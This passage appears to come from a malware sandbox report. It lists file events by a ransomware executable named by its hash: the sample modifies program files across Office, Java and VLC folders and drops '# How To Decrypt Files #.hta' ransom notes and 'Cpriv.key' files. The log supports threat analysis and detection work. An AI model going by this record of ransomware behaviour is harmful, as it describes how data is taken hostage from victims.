Shared\ink\fsdefinitions\symbols\symbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Visualizations\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02022_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OIS_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\AXIS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285808.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado20.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\PROOF\MSWDS_FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.IDX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21321_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\RADAR.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Publisher.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\co\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OIS_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\timeZones.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214934.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR22F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Users.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\FAX\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Newsprint.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\EXLIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_TexturedBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\blocklist.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01657_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JNGLE_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00170_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0298653.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB5B.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00388_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR44B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10266_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\MediaReceiverRegistrar.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\ext\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART12.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\is\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\WindowsPowerShell\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14533_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\HEADINGBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.APL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233018.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR18F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\BLUECALM.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\validation.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\uninstall\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1036\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BLANK.ONE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\RSSFeeds.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF 